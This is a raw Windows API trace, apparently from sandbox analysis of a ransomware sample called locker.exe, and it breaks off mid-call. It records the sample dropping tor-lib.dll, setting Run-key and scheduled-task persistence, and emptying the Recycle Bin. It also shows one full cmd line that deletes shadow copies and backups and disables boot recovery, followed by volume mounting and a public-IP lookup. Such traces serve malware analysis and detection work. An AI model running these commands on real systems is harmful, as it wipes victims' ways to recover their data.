[0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0078.715] GetLastError () returned 0x2 [0078.715] SetLastError (dwErrCode=0x2) [0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.715] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.715] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3daa50 | out: hHeap=0x3c0000) returned 1 [0078.715] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e4ac0 | out: hHeap=0x3c0000) returned 1 [0078.715] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da980 | out: hHeap=0x3c0000) returned 1 [0078.715] GetLastError () returned 0x2 [0078.715] SetLastError (dwErrCode=0x2) [0078.715] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3da980 [0078.716] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3da990 [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x200) returned 0x3d6ef0 [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x3daa50 [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3e4ac0 [0078.716] GetLastError () returned 0x2 [0078.716] SetLastError (dwErrCode=0x2) [0078.716] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.716] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.716] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da980 | out: hHeap=0x3c0000) returned 1 [0078.716] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cf9b0 | out: hHeap=0x3c0000) returned 1 [0078.716] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3daa50 | out: hHeap=0x3c0000) returned 1 [0078.717] GetLastError () returned 0x2 [0078.717] SetLastError (dwErrCode=0x2) [0078.717] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3da980 [0078.717] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da990 | out: hHeap=0x3c0000) returned 1 [0078.717] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3daa60 | out: hHeap=0x3c0000) returned 1 [0078.717] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x3da990 [0078.717] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x3daa50 [0078.717] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x38) returned 0x3e0d58 [0078.717] AreFileApisANSI () returned 1 [0078.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0078.717] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x3d73b8 [0078.717] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3d2cc0, cbMultiByte=-1, lpWideCharStr=0x3d73b8, cchWideChar=36 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll") returned 36 [0078.717] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll" (normalized: "c:\\users\\fd1hvy\\desktop\\tor-lib.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xdcf840, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0078.720] GetFileType (hFile=0x238) returned 0x1 [0078.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d73b8 | out: hHeap=0x3c0000) returned 1 [0078.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x3daa60 [0078.720] GetLastError () returned 0x0 [0078.720] SetLastError (dwErrCode=0x0) [0078.720] GetLastError () returned 0x0 [0078.720] SetLastError (dwErrCode=0x0) [0078.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0078.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da980 | out: hHeap=0x3c0000) returned 1 [0078.720] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e4ac0 | out: hHeap=0x3c0000) returned 1 [0078.720] GetLastError () returned 0x0 [0078.720] SetLastError (dwErrCode=0x0) [0078.720] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3da980 [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3e6660 [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x3e65a0 [0078.721] GetLastError () returned 0x0 [0078.721] SetLastError (dwErrCode=0x0) [0078.721] GetLastError () returned 0x0 [0078.721] SetLastError (dwErrCode=0x0) [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3e4ac0 [0078.721] GetLastError () returned 0x0 [0078.721] SetLastError (dwErrCode=0x0) [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.721] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.721] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da980 | out: hHeap=0x3c0000) returned 1 [0078.721] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cf9b0 | out: hHeap=0x3c0000) returned 1 [0078.721] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e65a0 | out: hHeap=0x3c0000) returned 1 [0078.721] GetLastError () returned 0x0 [0078.721] SetLastError (dwErrCode=0x0) [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3e65b0 [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x2) returned 0x3e6650 [0078.721] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0x4) returned 0x3e6560 [0078.721] GetLastError () returned 0x0 [0078.721] SetLastError (dwErrCode=0x0) [0078.721] GetLastError () returned 0x0 [0078.722] SetLastError (dwErrCode=0x0) [0078.722] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x8, Size=0xb8) returned 0x3cf9b0 [0078.722] GetLastError () returned 0x0 [0078.722] SetLastError (dwErrCode=0x0) [0078.722] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a6) returned 0x3e8a68 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e65b0 | out: hHeap=0x3c0000) returned 1 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e4ac0 | out: hHeap=0x3c0000) returned 1 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e6560 | out: hHeap=0x3c0000) returned 1 [0078.722] GetLastError () returned 0x0 [0078.722] SetLastError (dwErrCode=0x0) [0078.722] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6) returned 0x3e6590 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e6650 | out: hHeap=0x3c0000) returned 1 [0078.722] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e6660 | out: hHeap=0x3c0000) returned 1 [0078.722] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x3e65d0 [0078.722] WriteFile (in: hFile=0x238, lpBuffer=0x38e070*, nNumberOfBytesToWrite=0x9000, lpNumberOfBytesWritten=0xdcf894, lpOverlapped=0x0 | out: lpBuffer=0x38e070*, lpNumberOfBytesWritten=0xdcf894*=0x9000, lpOverlapped=0x0) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x3e8a68 [0078.727] GetLastError () returned 0x0 [0078.727] GetProcAddress (hModule=0x74bc0000, lpProcName="FlsGetValue") returned 0x74ca70c0 [0078.727] SetLastError (dwErrCode=0x0) [0078.727] WriteFile (in: hFile=0x238, lpBuffer=0x3e8a68*, nNumberOfBytesToWrite=0x800, lpNumberOfBytesWritten=0xdcf958, lpOverlapped=0x0 | out: lpBuffer=0x3e8a68*, lpNumberOfBytesWritten=0xdcf958*=0x800, lpOverlapped=0x0) returned 1 [0078.727] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e8a68 | out: hHeap=0x3c0000) returned 1 [0078.727] CloseHandle (hObject=0x238) returned 1 [0078.730] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3daa50 | out: hHeap=0x3c0000) returned 1 [0078.730] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3da920 | out: hHeap=0x3c0000) returned 1 [0078.730] LoadLibraryA (lpLibFileName="C:\\Users\\FD1HVy\\Desktop\\tor-lib.dll") returned 0x74190000 [0078.797] atexit (param_1=0x74198a0d) returned 0 [0078.798] GetEnvironmentVariableA (in: lpName="csp_alt_prov", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.798] CryptAcquireContextA (in: phProv=0x7419a1a4, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7419a1a4*=0x3cf450) returned 1 [0079.369] CryptAcquireContextA (in: phProv=0x7419a1a8, szContainer=0x0, szProvider="Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider", dwProvType=0xd, dwFlags=0xf0000000 | out: phProv=0x7419a1a8*=0x3e57b0) returned 1 [0079.832] atexit (param_1=0x74198a19) returned 0 [0079.833] atexit (param_1=0x74198a4c) returned 0 [0079.833] GetUserNameA (in: lpBuffer=0xdcfb30, pcbBuffer=0xdcfc30 | out: lpBuffer="FD1HVy", pcbBuffer=0xdcfc30) returned 1 [0079.847] GetComputerNameA (in: lpBuffer=0xdcfb2c, nSize=0xdcfc2c | out: lpBuffer="NQDPDE", nSize=0xdcfc2c) returned 1 [0079.847] GetComputerNameA (in: lpBuffer=0xdcfb30, nSize=0xdcfc30 | out: lpBuffer="NQDPDE", nSize=0xdcfc30) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0348 [0079.847] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x3d2cf8 [0079.847] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e0348 | out: hHeap=0x3c0000) returned 1 [0079.847] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x3d7458 [0079.848] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d2cf8 | out: hHeap=0x3c0000) returned 1 [0079.848] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfaa8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0079.848] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", phkResult=0xdcfbf4 | out: phkResult=0xdcfbf4*=0x26c) returned 0x0 [0079.849] RegSetValueExA (in: hKey=0x26c, lpValueName="Mouse Application", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\Desktop\\locker.exe", cbData=0x22 | out: lpData="C:\\Users\\FD1HVy\\Desktop\\locker.exe") returned 0x0 [0079.850] RegCloseKey (hKey=0x26c) returned 0x0 [0079.850] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x3d2a58 [0079.850] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x3d74a8 [0079.850] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d2a58 | out: hHeap=0x3c0000) returned 1 [0079.850] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x6a) returned 0x3cea40 [0079.850] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d74a8 | out: hHeap=0x3c0000) returned 1 [0079.850] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x3d1bb0 [0079.852] ShellExecuteA (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/C schtasks /Create /SC MINUTE /TN \"Mouse Application\" /TR \"C:\\Users\\FD1HVy\\Desktop\\locker.exe\" /f", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0096.121] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d1bb0 | out: hHeap=0x3c0000) returned 1 [0096.121] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3cea40 | out: hHeap=0x3c0000) returned 1 [0096.123] SHEmptyRecycleBinA (hwnd=0x0, pszRootPath=0x0, dwFlags=0x7) returned 0x8000ffff [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0348 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x41d760 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42c130 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42c168 [0100.295] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x41d760 | out: hHeap=0x3c0000) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x40e200 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x48) returned 0x403660 [0100.295] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c168 | out: hHeap=0x3c0000) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42c088 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ecc30 [0100.295] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x403660 | out: hHeap=0x3c0000) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42c168 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x90) returned 0x42a728 [0100.295] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ecc30 | out: hHeap=0x3c0000) returned 1 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x78) returned 0x425a28 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0618 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42c0c0 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x3eb698 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b838 [0100.295] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b758 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e06b8 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e04b0 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e06b8 | out: hHeap=0x3c0000) returned 1 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b368 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x3eb920 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e04b0 | out: hHeap=0x3c0000) returned 1 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b368 | out: hHeap=0x3c0000) returned 1 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x419fc0 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x80) returned 0x40aaa8 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3eb920 | out: hHeap=0x3c0000) returned 1 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419fc0 | out: hHeap=0x3c0000) returned 1 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x3eb920 [0100.296] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xc0) returned 0x3f2258 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40aaa8 | out: hHeap=0x3c0000) returned 1 [0100.296] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3eb920 | out: hHeap=0x3c0000) returned 1 [0100.296] ShellExecuteA (hwnd=0x0, lpOperation="open", lpFile="cmd.exe", lpParameters="/C wmic SHADOWCOPY DELETE & wbadmin DELETE SYSTEMSTATEBACKUP & bcdedit.exe / set{ default } bootstatuspolicy ignoreallfailures & bcdedit.exe / set{ default } recoveryenabled No", lpDirectory=0x0, nShowCmd=0) returned 0x2a [0101.685] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3f2258 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e0618 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c0c0 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3eb698 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b838 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b758 | out: hHeap=0x3c0000) returned 1 [0101.686] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x425a28 | out: hHeap=0x3c0000) returned 1 [0101.688] GetLogicalDriveStringsA (in: nBufferLength=0x400, lpBuffer=0xdcf334 | out: lpBuffer="C:\\") returned 0x4 [0101.689] GetDriveTypeA (lpRootPathName="C:\\") returned 0x3 [0101.689] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x18) returned 0x40ee30 [0101.690] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40ee30 | out: hHeap=0x3c0000) returned 1 [0101.690] GetVolumePathNamesForVolumeNameA (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\", lpszVolumePathNames=0xdcf778, cchBufferLength=0x104, lpcchReturnLength=0xdcfa90 | out: lpszVolumePathNames="C:\\", lpcchReturnLength=0xdcfa90) returned 1 [0101.691] GetLastError () returned 0xea [0101.692] SetLastError (dwErrCode=0xea) [0101.692] SetVolumeMountPointA (lpszVolumeMountPoint="D:\\", lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-100000000000}\\") returned 0 [0101.695] FindNextVolumeA (in: hFindVolume=0x3f2258, lpszVolumeName=0xdcf980, cchBufferLength=0x104 | out: hFindVolume=0x3f2258, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0101.695] GetVolumePathNamesForVolumeNameA (in: lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\", lpszVolumePathNames=0xdcf778, cchBufferLength=0x104, lpcchReturnLength=0xdcfa90 | out: lpszVolumePathNames="", lpcchReturnLength=0xdcfa90) returned 1 [0101.697] GetLastError () returned 0x0 [0101.697] SetLastError (dwErrCode=0x0) [0101.697] SetVolumeMountPointA (lpszVolumeMountPoint="E:\\", lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 1 [0101.700] FindNextVolumeA (in: hFindVolume=0x3f2258, lpszVolumeName=0xdcf980, cchBufferLength=0x104 | out: hFindVolume=0x3f2258, lpszVolumeName="\\\\?\\Volume{df759572-0000-0000-0000-10c37f000000}\\") returned 0 [0101.700] FindVolumeClose (hFindVolume=0x3f2258) returned 1 [0101.700] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e0348 | out: hHeap=0x3c0000) returned 1 [0101.700] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c130 | out: hHeap=0x3c0000) returned 1 [0101.700] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x40e200 | out: hHeap=0x3c0000) returned 1 [0101.700] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c088 | out: hHeap=0x3c0000) returned 1 [0101.701] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42c168 | out: hHeap=0x3c0000) returned 1 [0101.701] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42a728 | out: hHeap=0x3c0000) returned 1 [0101.701] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d7458 | out: hHeap=0x3c0000) returned 1 [0101.701] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0348 [0101.701] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e04b0 [0101.701] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0578 [0101.701] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0xdcf994 | out: lpWSAData=0xdcf994) returned 0 [0101.710] socket (af=2, type=1, protocol=6) returned 0x4a0 [0103.005] htons (hostshort=0x50) returned 0x5000 [0103.005] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x3e0618 [0103.005] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e0618 | out: hHeap=0x3c0000) returned 1 [0103.005] gethostbyname (name="api.ipify.org") returned 0x42fe30*(h_name="elb097307-934924932.us-east-1.elb.amazonaws.com", h_aliases=0x42fe40*=([0]="api.ipify.org", [1]="nagano-19599.herokussl.com"), h_addrtype=2, h_length=4, h_addr_list=0x42fe4c*=([0]="50.19.252.36", [1]="54.204.14.42", [2]="54.227.255.202", [3]="54.235.98.120", [4]="54.235.169.38", [5]="23.21.252.4", [6]="54.225.66.103", [7]="54.225.169.28")) [0111.807] connect (s=0x4a0, name=0xdcfb3c*(sa_family=2, sin_port=0x50, sin_addr="50.19.252.36"), namelen=16) returned 0 [0111.981] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0111.981] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x406de0 [0111.981] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x406de0 | out: hHeap=0x3c0000) returned 1 [0111.981] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0111.981] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0111.981] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407128 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b678 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407128 | out: hHeap=0x3c0000) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x47) returned 0x402ee0 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b678 | out: hHeap=0x3c0000) returned 1 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x70) returned 0x4201c0 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x402ee0 | out: hHeap=0x3c0000) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xa7) returned 0x3d6d58 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4201c0 | out: hHeap=0x3c0000) returned 1 [0111.982] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x406de0 [0111.982] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x406de0 | out: hHeap=0x3c0000) returned 1 [0111.982] send (s=0x4a0, buf=0x3d6d58*, len=143, flags=0) returned 143 [0111.984] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x439018 [0111.984] recv (in: s=0x4a0, buf=0x439018, len=4096, flags=0 | out: buf=0x439018*) returned 184 [0112.156] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0xc0) returned 0x3fec28 [0112.156] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x439018 | out: hHeap=0x3c0000) returned 1 [0112.156] closesocket (s=0x4a0) returned 0 [0112.156] WSACleanup () returned 0 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3d6d58 | out: hHeap=0x3c0000) returned 1 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e0578 | out: hHeap=0x3c0000) returned 1 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e04b0 | out: hHeap=0x3c0000) returned 1 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3fec28 | out: hHeap=0x3c0000) returned 1 [0112.308] GetLocalTime (in: lpSystemTime=0xdcfc14 | out: lpSystemTime=0xdcfc14*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0x1c, wHour=0xd, wMinute=0x34, wSecond=0x3b, wMilliseconds=0x18)) [0112.308] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfab8, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0112.308] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b3a0 [0112.308] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xdcfaa4, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0112.308] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b800 [0112.308] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x407038 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b800 | out: hHeap=0x3c0000) returned 1 [0112.308] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x407038 | out: hHeap=0x3c0000) returned 1 [0112.309] AreFileApisANSI () returned 1 [0112.309] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42b3a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 35 [0112.309] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x46) returned 